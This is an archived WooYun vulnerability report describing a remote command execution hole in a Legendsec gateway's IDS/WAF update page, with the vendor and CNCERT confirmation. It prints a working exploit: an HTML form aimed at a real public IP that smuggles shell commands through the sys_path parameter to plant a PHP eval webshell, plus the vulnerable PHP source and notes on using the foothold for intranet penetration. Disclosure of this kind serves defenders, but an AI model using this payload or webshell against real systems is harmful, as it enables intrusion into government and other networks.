当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027324

漏洞标题:[再浅谈内网安全]--网神某带ids,waf网关设备完控0day又一枚

相关厂商:网神

漏洞作者: 紫梦芊

提交时间:2013-07-01 11:51

修复时间:2013-09-29 11:51

公开时间:2013-09-29 11:51

漏洞类型:设计不当

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-01: 细节已通知厂商并且等待厂商处理中
2013-07-05: 厂商已经确认,细节仅向厂商公开
2013-07-08: 细节向第三方安全合作伙伴开放
2013-08-29: 细节向核心白帽子及相关领域专家公开
2013-09-08: 细节向普通白帽子公开
2013-09-18: 细节向实习白帽子公开
2013-09-29: 细节向公众公开

简要描述:

之前发布的国内外VPN网关0day包括了网神 现在再爆他们带ids和waf版本远程命令执行的0day一枚
问题很普通。

详细说明:

话不多说直接上0day.

<form action="https://221.202.118.50/admin/ids/waf_update.php" method="post">
<input type="hidden" name="uptype" value="1">
<input type="hidden" name="sys_path" value="http://update.cisco.com/tmp.bin -O /data/upload/__ids_up__.bin || echo '<? eval($_POST[cmd])?>' >/ssl/www/bug2.php ||whoami ">
<input type="submit" name="Submit">
</form>


221.202.118.50 是葫芦岛市绩效考核系统 这个应该是网神VPN最新版本 感觉用户体验还不赖
来看看问题出在哪儿

include_once "management/system.php";
include_once "management/ids.php";
$uptype =1;
if ($_FILES['ids_file'] || isset($_POST["sys_path"])) {
	$uptype = $_POST["uptype"];
	if($_POST["uptype"] == 2){
		$file_size = $_FILES['ids_file']['size'];
		$file_type = $_FILES['ids_file']['type'];	
		$temp_name = $_FILES['ids_file']['tmp_name'];
		$file_name = $_FILES['ids_file']['name'];
		$file_name = str_replace("\\","",$file_name);
		$file_name = str_replace("'","",$file_name);
		$file_name = str_replace(" ","",$file_name);
		$file_path = $CFG_UPLOAD_PATH."__ids_up__.bin";
		//File Name Check
		if ( $file_name == "" ) { 
			echo "Invalid File Name Specified";
			return;
		}
		$result = move_uploaded_file($temp_name, $file_path);
	}else{
		$file_path = "/data/upload/__ids_up__.bin";
		$url = trim($_POST["sys_path"]);
		$url ="http://".$url;
		system("wget -t 3 $url -O $file_path ");	
	}
	$SM = new IDSManager;
	$V = $SM->snort_update($ticket,$file_path);
}


看代码可以看出是能从web上传 也可以从sys_path参数获取到的地址下载 然后进行snort的升级
用system(wget)进行的下载 进行升级钱应该有个ticket判断 这个相当于session或token
还有一要素 management/system.php 和 management/ids.php 是没有在当前目录下的 所以执行0day后出现如此

ws44.jpg


看到这个Fatal error 很多人瞬间放弃 也许他们测试也测过这里 但是 我们的system在31行之前,无影响(这就是脚本语言的好处之一,运维可以说是噩梦之一,呵呵)
菜刀一连

vvv.jpg


还有些泄漏的源码 看来应该不大重要 但是不应该放在web目录下

vvv2.jpg

漏洞证明:

https://221.202.118.50/bug2.php cmd

ddd.jpg


葫芦岛市的用户不少 我在这里抛个砖,引点大家的玉

ws1.jpg


这个...完全只防了正规途径啊..

ws2.jpg


这个...依然

ws3.jpg


这个NAT配置是个很方便的东西 方便对iptables不熟悉的朋友进行内网渗透
PS:其实当前有不少数SOC以及IDS等防御方式不够完善,大多只对正规途径来的用户行为进行了审计防范,一些另类的方式或是不常用的方式并不审计,或审计较弱,还有普遍现象是大量无用信息没有归纳挖掘,网络管理员也懒得看了。

修复方案:

找乌云官方进行乌云众测
(PS:你们竞争对手sinfor也做了众测)

版权声明:转载请注明来源 紫梦芊@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2013-07-05 00:04

厂商回复:

CNVD确认并复现所述情况,同时对于该设备进行分析后,检测发现若干暴露在互联网上的实例,可以初步确认通用性。拟由CNCERT直接联系厂商处置,同时将继续检测互联网上可能涉及政府和重要信息系统部门的事件,后续加强处置。
rank 17

最新状态:

暂无